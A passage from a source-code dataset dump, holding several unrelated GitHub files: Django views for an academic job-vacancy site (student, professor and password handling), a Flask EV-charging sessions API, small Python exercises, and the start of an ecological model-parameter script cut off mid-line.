form.cleaned_data['Nome_Completo']\n Nome = texto.split(\" \", 1)\n aluno.endereco = form.cleaned_data['Rua'] + ',' + \\\n form.cleaned_data['Numero'] + ',' + \\\n form.cleaned_data['Complemento'] + ',' + \\\n form.cleaned_data['Cidade'] + ',' + \\\n form.cleaned_data['Estado']\n aluno.save()\n aluno.user.first_name = Nome[0]\n if len(Nome) > 1:\n aluno.user.last_name = Nome[1]\n aluno.habilidades = form.cleaned_data['habilidades']\n aluno.user.save()\n messages.success(request, 'Editado com sucesso')\n return redirect(exibir_aluno, pk)\n else:\n form = FormularioEditarAluno(instance=aluno, initial=initial)\n return render(request, 'sva/aluno/EditarAluno.html', {'form': form})\n\n\n@login_required(login_url='/accounts/login/')\ndef excluir_aluno(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n if aluno is not None:\n aluno.user.is_active = False\n aluno.user.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n\n\ndef exibir_aluno(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n context = {'aluno': aluno}\n return render(request, 'sva/aluno/Perfil.html', context)\n\ndef upload_curriculo(request,pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n if request.method == 'POST':\n form = UploadCurriculo(request.FILES)\n if form.is_valid():\n try:\n try:\n os.remove(aluno.curriculo.path)\n aluno.curriculo = request.FILES['curriculo']\n except:\n aluno.curriculo = request.FILES['curriculo']\n try:\n validate_file_extension(request.FILES['curriculo'])\n aluno.curriculo.name = 'Curriculo'+str(pk)+'.pdf'\n aluno.data_upload_curriculo = timezone.now()\n aluno.save()\n messages.success(request, \"Upload com sucesso\", mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/aluno/curriculo/' + str(pk))\n except:\n messages.error(request, 'Formato não aceito')\n except:\n messages.error(request,'Campo de envio não preenchido')\n else:\n form = UploadCurriculo()\n curriculo = None\n if aluno.curriculo.name != None:\n spl = aluno.curriculo.name.split(\"/\")\n\n if len(spl) == 2:\n curriculo = spl[1]\n try:\n return render(request, 'sva/aluno/curriculo.html', {'form': form,'curriculo':curriculo,'data':aluno.data_upload_curriculo,'visualizar':aluno.curriculo})\n except:\n return render(request, 'sva/aluno/curriculo.html', {'form': form,'curriculo':curriculo,'data':aluno.data_upload_curriculo,'visualizar':None})\n@login_required(login_url='/accounts/login/')\ndef excluir_curriculo(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n if aluno is not None:\n if os.path.isfile(aluno.curriculo.path):\n os.remove(aluno.curriculo.path)\n aluno.curriculo.name = \"\"\n aluno.save()\n messages.success(request,\"Excluido com sucesso\", mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/aluno/curriculo/'+str(pk))\n\ndef download_curriculo(request,pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n filename = aluno.curriculo.name.split('/')[-1]\n response = HttpResponse(aluno.curriculo, content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=%s' % filename\n\n return response\n###############################################################################\n# ACESSO #\n###############################################################################\n\n\ndef layout(request):\n form = FormularioContato()\n return render(request, 'sva/layout.html', {'form': form})\n\n\ndef recuperar_senha(request):\n if request.method == \"GET\":\n return render(request, 'registration/recuperarSenha.html', {})\n\n email = request.POST['email']\n try:\n user = User.objects.get(email=email)\n except User.DoesNotExist:\n user = None\n\n if user is not None:\n novasenha = ''.join([choice(string.ascii_letters + string.digits) for i in range(8)])\n send_mail(\n 'Recuperação de Senha - Sistema de Vagas Acadêmicas',\n 'Sua nova senha é:\\n\\n' + novasenha + '\\n\\nPara alterar para uma nova senha de sua preferência,'\n ' acesse sua conta no site sva.cefetmg.br e vá na pagina'\n ' de configurações do Usuário\\n\\nSVA',\n 'from@example.com',\n [email],\n )\n user.set_password(novasenha)\n user.save()\n messages.success(request, _('Sua nova senha foi enviado para o email a sua conta!'))\n return redirect('login')\n else:\n messages.error(request, mensagens.ERRO_EMAIL_INVALIDO, mensagens.MSG_ERRO)\n return render(request, 'registration/recuperarSenha.html', {})\n\n\ndef alterar_senha(request):\n if request.method == 'POST':\n form = PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user)\n messages.success(request, _('Sua senha foi alterada com sucesso!'))\n return redirect('home')\n else:\n messages.error(request, _('Por favor, corrija os erros abaixo'))\n else:\n form = PasswordChangeForm(request.user)\n return render(request, 'registration/alterar_senha.html', {\n 'form': form\n })\n\n\n###############################################################################\n# PROFESSOR #\n###############################################################################\n\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef editar_professor(request, pk):\n professor = get_object_or_404(Professor, user__pk=pk)\n Nome = professor.user.first_name + ' ' + professor.user.last_name\n Telefone = professor.telefone\n Curso = professor.curso\n Email = professor.user.email\n initial = {\n 'Nome_Completo': Nome,\n 'telefone': Telefone,\n 'Curso': Curso,\n 'Email': Email}\n\n if request.method == 'POST':\n form = FormularioEditarProfessor(request.POST, instance=professor, initial=initial)\n if form.is_valid():\n texto = form.cleaned_data['Nome_Completo']\n Nome = texto.split(\" \", 1)\n professor.user.email = form.cleaned_data['Email']\n professor.curso = form.cleaned_data['curso']\n professor.siape = form.cleaned_data['siape']\n professor.telefone = form.cleaned_data['telefone']\n professor.save()\n professor.user.first_name = Nome[0] if len(Nome) > 0 else ''\n professor.user.last_name = Nome[1] if len(Nome) > 1 else ''\n professor.user.save()\n messages.success(request, 'Editado com sucesso!')\n return redirect(exibir_professor, professor.user.id)\n else:\n form = FormularioEditarProfessor(instance=professor, initial=initial)\n return render(request, 'sva/professor/EditarProfessor.html', {'form': form, 'professor': professor})\n\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef excluir_professor(request, pk):\n professor = get_object_or_404(Professor, user__pk=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n\n vagas = Vaga.objects.filter(gerente_vaga=professor)\n do_not_execute = False\n for vaga in vagas:\n if vaga.vencida is False and vaga.situacao == 3:\n do_not_execute = True\n if do_not_execute is False:\n Vaga.objects.filter(gerente_vaga=professor, situacao__range=(1,3)).update(situacao=4)\n professor.user.is_active = False\n professor.situacao = Professor.EXCLUIDO\n professor.user.save()\n professor.save()\n messages.error(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n else:\n messages.error(request, mensagens.ERRO_HA_VAGAS_ATIVAS, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n\n@login_required(login_url=\"/home/\")\ndef Listar_Vagas_Aluno(request, pk):\n aluno = get_object_or_404(Aluno, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n form = FormularioPesquisaVagasAluno(request.POST)\n context = {}\n context['form']=form\n if form.is_valid():\n if form.cleaned_data['Area_Atuacao']==\"\":\n context['vagas_inscritas'] = Vaga.objects.filter(alunos_inscritos=aluno,titulo__icontains= form.cleaned_data['Vaga_Cadastrada'])\n context['vagas_interesse'] = Vaga.objects.filter(alunos_interessados=aluno,titulo__icontains=form.cleaned_data['Vaga_Cadastrada'])\n elif form.cleaned_data['Vaga_Cadastrada']==\"\":\n areas=AreaAtuacao.objects.filter(nome__icontains= form.cleaned_data['Area_Atuacao'])\n for area in areas:\n context['vagas_inscritas'] = Vaga.objects.filter(alunos_inscritos=aluno, areas_atuacao=area.id)\n context['vagas_interesse'] = Vaga.objects.filter(alunos_interessados=aluno, areas_atuacao=area.id)\n else:\n areas = AreaAtuacao.objects.filter(nome__icontains=form.cleaned_data['Area_Atuacao'])\n for area in areas:\n context['vagas_inscritas'] = Vaga.objects.filter(alunos_inscritos=aluno,titulo__icontains= form.cleaned_data['Vaga_Cadastrada'], areas_atuacao=area.id)\n context['vagas_interesse'] = Vaga.objects.filter(alunos_interessados=aluno,titulo__icontains= form.cleaned_data['Vaga_Cadastrada'], areas_atuacao=area.id)\n else:\n context['vagas'] = Vaga.objects.filter(alunos_inscritos=aluno)\n context['now']= timezone.now()\n return render(request, 'sva/aluno/Vagas.html', context)\n\n\n@login_required(login_url='/accounts/login/')\ndef exibir_professor(request, pk):\n professor = get_object_or_404(Professor, user_id=pk)\n context = {'professor': professor,\n 'form_aprovacao': FormularioAprovacao()}\n return render(request, 'sva/professor/Perfil.html', context)\n\n\n@login_required(login_url='/accounts/login/')\ndef listar_professor(request):\n form = FormularioPesquisaProfessor(request.POST)\n professores = professores = Professor.objects.filter(situacao=Professor.DEFERIDO)\n if form.is_valid():\n if form.cleaned_data['curso_campus_nome'] is not None and form.cleaned_data['curso_campus_nome'] != \"\":\n valor = form.cleaned_data['curso_campus_nome']\n query = Professor.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n professores = query.filter(Q(situacao=Professor.DEFERIDO) & (\n Q(search_name__icontains=valor) |\n Q(curso__nome__icontains=valor) |\n Q(curso__campus__nome__icontains=valor)))\n context = {\n 'titulo_lista': 'Professores Cadastrados',\n 'liberar_cadastro': False,\n 'form': form,\n 'professores': professores,\n 'people': ProfessorTable(),\n }\n return render(request, 'sva/professor/ListarProfessores.html', context)\n\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef liberar_cadastro_professores_lista(request):\n form = FormularioPesquisaProfessor(request.POST)\n professores = Professor.objects.filter(situacao=Professor.AGUARDANDO_APROVACAO)\n if form.is_valid():\n if form.cleaned_data['curso_campus_nome'] is not None and form.cleaned_data['curso_campus_nome'] != \"\":\n valor = form.cleaned_data['curso_campus_nome']\n query = Professor.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n professores = query.filter(Q(situacao=Professor.AGUARDANDO_APROVACAO) & (\n Q(search_name__icontains=valor) |\n Q(curso__nome__icontains=valor) |\n Q(curso__campus__nome__icontains=valor)))\n context = {\n 'titulo_lista': 'Professores com Cadastro Pendente',\n 'liberar_cadastro': True,\n 'form': form,\n 'professores': professores,\n 'people': ProfessorTable(),\n }\n return render(request, 'sva/professor/ListarProfessores.html', context)\n\n\n@transaction.atomic\n@login_required\n@require_POST\n@user_passes_test(is_admin)\ndef aprovar_cadastro_professor(request, pk):\n professor = get_object_or_404(Professor, user__pk=pk)\n form = FormularioAprovacao(request.POST)\n if professor is not None and form.is_valid() and form.cleaned_data['aprovado'] == 'true':\n professor.user.is_active = True\n professor.user.is_staff = True\n professor.user.save()\n professor.data_aprovacao = datetime.now()\n professor.situacao = Professor.DEFERIDO\n professor.save()\n mensagem = 'Seu cadastro no SVA foi aprovado por %s. Segue mensagem:\\n\\n %s' \\\n 'Você agora pode acessar o sistema\\n\\nSVA' \\\n % (request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Aprovação de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [professor.user.email])\n else:\n professor.situacao = Professor.INDEFERIDO\n professor.data_aprovacao = None\n professor.save()\n mensagem = 'Seu cadastro no SVA foi recusado por %s. Segue mensagem:\\n\\n%s\\n\\nSVA' \\\n % (request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Recusa de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [professor.user.email])\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return render(request, 'sva/professor/Perfil.html', {'professor': professor})\n\n\n@transaction.atomic\ndef acessar_notificacao(request):\n pk = request.GET.get('pk', None)\n notificacao = Notificacao.objects.get(pk=pk) if pk or pk!='' else None\n if not notificacao:\n data = {'erro': True}\n return JsonResponse(data)\n notificacao.lida = True\n notificacao.data_leitura = datetime.now()\n notificacao.save()\n data = {\n 'sucesso': True,\n 'id_link': 'notflink-%d' % notificacao.pk,\n 'link': notificacao.link\n }\n return JsonResponse(data)\n\n@csrf_exempt\ndef gerenciar_areaatuacao(request):\n context={}\n areas=AreaAtuacao.objects.filter(situacao=\"DEFERIDO\");\n areasaaprovar=AreaAtuacao.objects.filter(situacao=\"AGUARDANDO_APROVACAO\");\n context['areas'] = areas\n context['areasaaprovar'] = areasaaprovar\n\n if request.is_ajax():\n if(request.POST['type']==\"edit\"):\n area=AreaAtuacao.objects.get(id=int(request.POST['id']))\n contareas = AreaAtuacao.objects.filter(nome=request.POST['data'], situacao=\"DEFERIDO\").count()\n contareas = contareas + AreaAtuacao.objects.filter(nome=request.POST['data'], situacao=\"INDEFERIDO\").count()\n if area.nome == request.POST['data']:\n contareas = contareas-1;\n if contareas:\n messages.success(request, 'Área de atuação já adicionada!', mensagens.MSG_ERRO)\n return redirect(gerenciar_areaatuacao)\n area.nome=request.POST['data']\n # messages.success(request, 'Área de atuação editada com sucesso!', mensagens.MSG_SUCCESS)\n area.save()\n # return redirect(gerenciar_areaatuacao)\n if (request.POST['type']==\"delete\"):\n AreaAtuacao.objects.get(id=int(request.POST['id'])).delete()\n # messages.success(request, 'Área de atuação removida com sucesso!', mensagens.MSG_SUCCESS)\n # return redirect(gerenciar_areaatuacao)\n if (request.POST['type'] == \"deferida\"):\n area = AreaAtuacao.objects.get(id=int(request.POST['id']))\n area.situacao = \"DEFERIDO\"\n # messages.success(request, 'Área de atuação aprovada com sucesso!', mensagens.MSG_SUCCESS)\n area.save()\n areas = AreaAtuacao.objects.filter(situacao=\"DEFERIDO\");\n areasaaprovar = AreaAtuacao.objects.filter(situacao=\"AGUARDANDO_APROVACAO\");\n context['areas'] = areas\n context['areasaaprovar'] = areasaaprovar\n return redirect(gerenciar_areaatuacao)\n\n if request.method == 'POST':\n novaarea = AreaAtuacao()\n if AreaAtuacao.objects.filter(nome=request.POST['new_text']).exists():\n messages.error(request, _('Essa área de atuação já existe'), mensagens.MSG_ERRO)\n return redirect(gerenciar_areaatuacao)\n if request.POST.get('new_text','').isspace() or request.POST.get('new_text','') is '':\n messages.error(request, _('Entrada inválida'), mensagens.MSG_ERRO)\n return redirect(gerenciar_areaatuacao)\n novaarea.nome = request.POST.get('new_text','').strip()\n novaarea.situacao=\"DEFERIDO\"\n novaarea.save()\n messages.success(request, 'Área de atuação criada com sucesso!',mensagens.MSG_SUCCESS)\n return redirect(gerenciar_areaatuacao)\n\n return render(request, 'sva/vaga/GerenciarAreaAtuacao.html',context)\n\ndef render_to_json(request, data):\n return HttpResponse(\n json.dumps(data, ensure_ascii=False),\n mimetype=request.is_ajax() and \"application/json\" or \"text/html\"\n )\n","repo_name":"gustavohsborba/SVA","sub_path":"sva/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":73031,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"811596703","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n previous = None # A\n current = head # B\n while current:\n next_node = current.next \n current.next = previous # B.next = a \n previous = current # A = B \n current = next_node # B = C \n\n return previous\n \n \n","repo_name":"BambinoRiya/PythonClass","sub_path":"reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73295764106","text":"from flask import Blueprint, jsonify, Response, request,json\r\nfrom .models import Provider,Charge,Station,ChargingPoint\r\nimport datetime\r\nfrom .authorization import requires_auth\r\nfrom .jsontocsv import json2csv\r\nfrom flask import make_response\r\nfrom sqlalchemy import and_\r\nfrom flask_cors import cross_origin\r\n\r\nbp = Blueprint(\"sessionsperprovider\", __name__, url_prefix=\"/evcharge/api/SessionsPerProvider\")\r\n\r\ncsv_first_row = [\"ProviderID\",\"ProviderName\",\"StationID\",\"SessionID\",\"VehicleID\",\"StartedOn\",\"FinishedOn\",\"EnergyDelivered\",\"PricePolicyRef\",\"CostPerKWh\",\"TotalCost\"]\r\n\r\n\r\n@bp.route('///', methods=['GET'])\r\n@cross_origin(supports_credentials=True)\r\n@requires_auth\r\ndef sessionsperpoint(_,providerID,date_from,date_to):\r\n format = request.args.get('format')\r\n reqtime = request.args.get('time')\r\n csvbool = False\r\n if format == 'csv': csvbool = True\r\n try: dtf = datetime.datetime.strptime(date_from, '%Y-%m-%d')\r\n except: return make_response('Not valid date format (YYYY-MM-DD)', 400)\r\n try:\r\n dto = datetime.datetime.strptime(date_to, '%Y-%m-%d')\r\n except:\r\n return make_response('Not valid date format (YYYY-MM-DD)', 400)\r\n\r\n res = Provider.query.filter_by(id = providerID).first()\r\n if not res:\r\n return make_response('The Provider ID is invalid or doesnt exist', 400)\r\n res_id = res.id\r\n res_name = res.name_\r\n\r\n sessionsquery1 = Charge.query.filter(Charge.provider_id == providerID).order_by(Charge.date_).filter(Charge.date_.between(date_from,date_to)).all()\r\n sessionsquery2 = sessionsquery1\r\n\r\n if not sessionsquery2:\r\n return make_response('There are no sessions for this provider', 402)\r\n \r\n records = []\r\n for record in sessionsquery2:\r\n staid = ChargingPoint.query.filter_by(id = record.chargingpoint_id).first()\r\n if not staid: return make_response('Station doesnt exist', 402)\r\n\r\n \"\"\"\r\n pay = Transaction.query.filter_by(id=record.id).first()\r\n if not pay: return make_response('Transaction doesnt exist', 403)\r\n \"\"\"\r\n extra = {\"ProviderID\":str(res_id),\"ProviderName\":str(res_name),\"StationID\":str(staid.station_id),\r\n \"SessionID\":str(record.id),\"VehicleID\":str(record.vehicle_id), \"StartedOn\":str(record.connection_time),\r\n \"FinishedOn\":str(record.disconnection_time),\"EnergyDelivered\":str(record.kWhdelivered),\r\n \"PricePolicyRef\":str(\"null\"),\"CostPerKWh\":str(record.cost_per_kwh),\"TotalCost\":str(record.total_cost)}\r\n records.append(extra)\r\n\r\n if csvbool:\r\n csv_response = json2csv(records, csv_first_row)\r\n return Response(csv_response, mimetype='text/csv')\r\n else:\r\n return Response(json.dumps(records, sort_keys=False), mimetype='application/json')\r\n","repo_name":"LefterisLymp/SoftEng2020-21","sub_path":"back-end/app/sessionsperprovider.py","file_name":"sessionsperprovider.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10440709935","text":"# Simple Calculator: Create a basic calculator program that takes two numbers as input and allows the user to choose an operation (addition, subtraction, multiplication, division) to perform. Display the result using print() \n\n\n\n\nnum1=float(input(\"enter the first number:\"))\nnum2=float(input(\"enter the second number:\"))\n\noperators=input(\"+ - / * \")\n\nif operators == \"+\": \n print(round(num1+num2,))\n\nelif operators == \"-\":\n print(round(num1-num2))\n\nelif operators == \"*\":\n print(round(num1*num2))\n\nelif operators == \"/\":\n if num2 == 0:\n print(\"cannot divide by zero\")\n\n else:\n print(num1/num2)\n\nelse:\n print(\"enter the valid numbers\")\n \n","repo_name":"shiixxam/python_in_30_days","sub_path":"python/DAY2/input & output/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7757195615","text":"from django.core.exceptions import PermissionDenied\nfrom django.http import HttpRequest, HttpResponse\n\nfrom sales.models import Sellers\n\n\ndef check_seller_superuser(request: HttpRequest) -> HttpResponse:\n is_seller = False\n try:\n if Sellers.objects.filter(user=request.user):\n is_seller = True\n if request.user.is_authenticated:\n if request.user.is_superuser or is_seller:\n request.is_ok = True\n return request\n except TypeError: PermissionDenied\n","repo_name":"bakefayat/sales_plan","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23696370808","text":"import sys\nsys.setrecursionlimit(10**7)\ninput = lambda: sys.stdin.readline().strip()\n\ndef main():\n N = int(input())\n S_list = [input() for _ in range(N)]\n print(len(list(set(S_list))))\n\nmain()\n","repo_name":"memen10/atcoder","sub_path":"ABC/abc164/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17807629936","text":"from typing import List\n\ndef binarySearch (arr: List, l, r, x):\n if r >= l:\n # Check base case\n mid = l + (r - l) / 2\n mid = round(mid)\n mid = int(mid)\n if arr[mid] == x:\n # If element is present at the middle itself \n return mid\n elif arr[mid] > x:\n # If element is smaller than mid, then it \n # can only be present in left subarray \n return binarySearch(arr, l, mid - 1, x) \n else:\n # Else the element can only be present \n # in right subarray \n return binarySearch(arr, mid + 1, r, x) \n\n else: \n # Element is not present in the array \n return -1\n\n# Test ray \narr = [12, 93, 24, 40, 81, 77, 95]\nx = 77\n\n# Function call \nresult = binarySearch(arr, 0, len(arr) - 1, x) \n\nif result != -1: \n print(f\"Element is present at index {result}\")\nelse: \n print(\"Element is not present in array\")","repo_name":"Cyber-Netic/CIS.303.Final-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7826059614","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n # longest, start = 0, 0\n # hashmap = {}\n # for i, c in enumerate(s):\n # if c in hashmap and start <= hashmap[c]:\n # start = hashmap[c] + 1\n # else:\n # longest = max(longest, i-start+1) \n # hashmap[c] = i \n # return longest \n\n hashset = set()\n res = 0\n left = 0\n\n for i in range(len(s)):\n while s[i] in hashset:\n hashset.remove(s[left])\n left += 1\n hashset.add(s[i])\n \n res = max(res, len(hashset))\n\n return res\n\n\n \n \n","repo_name":"johnteye/A2SV--Onboarding-Phase","sub_path":"LongestSubstringwithoutRepeatingChar.py","file_name":"LongestSubstringwithoutRepeatingChar.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41655679846","text":"import os\nimport sys\nimport pandas as pd\nfrom pickle import dump, load\nimport numpy as np\nfrom gs_models import *\nfrom fit_gs_params import *\nfrom lmfit import Parameters\n\nsel = 'revision_0'\n\nres_dir = '../../DATA/EEGS/fitted_models_%s' % sel\nres_dir_2 = '../../DATA/EEGS/results_params'\n\nfig_dir = '../../PROJECTS/Stomatal_conductance_eval/results_figures/2_param_uncertainty'\nsites_params = pd.read_csv( '../../DATA/EEGS/sel2_sites_params.csv')\n\nparams_by_models = [['WUE_d', ['lww', 'b']],\n ['CM_d2', ['b1', 'b2']],\n ['CM_d4', ['b1', 'b2', 'a', 'psi_50']],\n ['SOX_d1', ['kmax', ]],\n ['SOX_d3', ['kmax', 'a', 'psi_50']],\n ['WUE_i', ['lww', 'b']],\n ['CM_i4', ['b1', 'b2', 'a', 'psi_50']],\n ['SOX_i3', ['kmax', 'a', 'psi_50']],\n ]\n\nmod_list = ['WUE_d', 'CM_d2', 'CM_d4', 'SOX_d1', 'SOX_d3', 'WUE_i', 'CM_i4', 'SOX_i3']\n\npft_list = ['NF', 'BF', 'G-C3', 'C-C3']\nsites = sites_params['site_id'].values\n\ndef by_site_params(f_name):\n out_file_m = os.path.join(res_dir_2, f_name)\n all_params = [] \n for site_i in sites:\n print (site_i)\n site_p = []\n pft = sites_params[sites_params['site_id'] == site_i]['pft'].values[0]\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') \n and (site_i in fi)][0]\n data_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('bs.csv')\n and (site_i in fi)][0]\n with open(pickle_file, 'rb') as fp:\n df = load(fp)\n \n data_i = pd.read_csv(data_file,\n header=0, index_col=0,\n parse_dates=True,\n infer_datetime_format=True)\n \n psi_min = np.nanmin(data_i['soil_water_pot'])\n psi_5 = np.percentile(data_i['soil_water_pot'], 5)\n l_hh = len(data_i.index)\n l_dd = len(data_i.resample('D').mean()['S'].dropna().index)\n n_y = len(list(set(data_i.index.year)))\n \n site_p = [site_i, pft, psi_min, psi_5, l_hh, l_dd, n_y]\n keys = ['site_id', 'pft', 'psi_min', 'psi_5', 'l_hh', 'l_dd', 'n_y']\n for m, param_list_m in params_by_models:\n site_p.append(df[m]['a_p_med'])\n site_p.append(np.abs(df[m]['a_fu1_med'])\n + np.abs(df[m]['a_fu2_med'])\n + np.abs(df[m]['a_fr_med'])\n + np.abs(df[m]['a_fs_med']))\n keys.append('Ap_%s' % m)\n keys.append('Af_%s' % m)\n for p in param_list_m:\n site_p.append(np.nanmedian(df[m][p]))\n keys.append('%s_%s' % (p, m))\n site_p.append(np.nanstd(df[m][p]))\n keys.append('%s_%s_std' % (p, m))\n all_params.append(site_p)\n \n all_params = zip(*all_params)\n df = {}\n for k, pi in zip(keys, all_params):\n df[k] = pi\n \n all_params = pd.DataFrame(df)\n all_params.to_csv(out_file_m)\n\n\ndef gen_loso_params(f_name):\n param_results = []\n out_file_m = os.path.join(res_dir_2, f_name)\n\n for mod, param_list_m in params_by_models:\n for p in param_list_m:\n for site in sites:\n pft = sites_params[(sites_params['site_id'] == site)]['pft'].values[0]\n print(site, mod, p, pft)\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site in fi)][0]\n with open(pickle_file, 'rb') as pf:\n df = load(pf)\n x_site = np.array(df[mod][p])\n \n sites_re = sites_params[(sites_params['pft'] == pft) \n & (sites_params['site_id'] != site)]['site_id'].values\n x = np.array([])\n for site_i in sites_re:\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site_i in fi)][0]\n with open(pickle_file, 'rb') as pf:\n df = load(pf)\n xx = np.array(df[mod][p])\n x = np.concatenate((x, xx), axis=None)\n \n param_results.append([site, mod, p, pft,\n np.nanmean(x), np.nanmedian(x), np.nanstd(x),\n np.nanmax(x), np.nanmin(x),\n np.percentile(x, 75), np.percentile(x, 25),\n np.nanmedian(x_site)])\n \n site, mod, p, pft, p_mean, p_median, p_std, p_max, p_min, p_p75, p_p25, s_median = zip(*param_results)\n\n gen_pft_params = pd.DataFrame({'site_id': site, 'model': mod, 'parameter': p, 'pft': pft,\n 'mean': p_mean, 'median': p_median, 'std': p_std,\n 'max': p_max, 'min': p_min, \n 'p75': p_p75, 'p25': p_p25, \n 'site_median': s_median})\n\n gen_pft_params.to_csv(out_file_m)\n\n\ndef overall_pft_params(f_name):\n param_results = []\n out_file_m = os.path.join(res_dir_2, f_name) \n for mod, param_list_m in params_by_models:\n for p in param_list_m:\n for pft in pft_list:\n print(mod, p, pft)\n \n x = np.array([])\n sites_pft = sites_params[(sites_params['pft']==pft)]['site_id'].values\n for site_i in sites_pft:\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site_i in fi)][0]\n with open(pickle_file, 'rb') as pf:\n df = load(pf)\n\n xx = np.array(df[mod][p])\n x = np.concatenate((x, xx), axis=None)\n\n param_results.append([mod, p, pft, np.nanmean(x), np.nanmedian(x), np.nanstd(x),\n np.nanmax(x), np.nanmin(x), np.percentile(x, 75), np.percentile(x, 25)])\n \n \n mod, p, pft, p_mean, p_median, p_std, p_max, p_min, p_p75, p_25 = zip(*param_results)\n\n pft_params = pd.DataFrame({'model': mod, 'parameter': p,\n 'pft': pft, 'mean': p_mean, 'median': p_median,\n 'std': p_std, 'max': p_max, 'min': p_min, \n 'p75': p_p75, 'p25': p_25})\n \n pft_params.to_csv(out_file_m)\n\n\ndef cal_gen_model(f_name_i):\n sites_files = [os.path.join(res_dir, f) \n for f in os.listdir(res_dir) \n if f.endswith('bs.csv')]\n \n gen_params_0 = pd.read_csv(os.path.join(res_dir_2, 'gen_params_table_%s.csv' % sel))\n \n for site_i in sites:\n pft_i = sites_params[sites_params['site_id'] == site_i]['pft'].values[0]\n \n gen_params = gen_params_0[gen_params_0['site_id']==site_i]\n pickle_file = [os.path.join(res_dir, fi) \n for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site_i in fi)][0]\n data_file = [os.path.join(res_dir, fi) \n for fi in os.listdir(res_dir) \n if fi.endswith('bs.csv') and (site_i in fi)][0]\n \n data_i = pd.read_csv(data_file, header = 0, index_col = 0, parse_dates = True, \n infer_datetime_format = True)\n with open(pickle_file, 'rb') as f:\n splitfit_results = load(f) \n \n xx = [data_i['VPD_l'].values, data_i['CO2'].values, data_i['GPP'].values, \n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values, \n data_i['S'].values, data_i['canopy_water_pot_pd'].values, data_i['leaf_water_pot'].values,\n data_i['Ga_mol'].values, data_i['Rn-G'].values,\n data_i['TA_F_MDS'].values, data_i['VPD_a'].values, \n data_i['P_air'].values, data_i['rho_air_d']]\n\n xx_l = 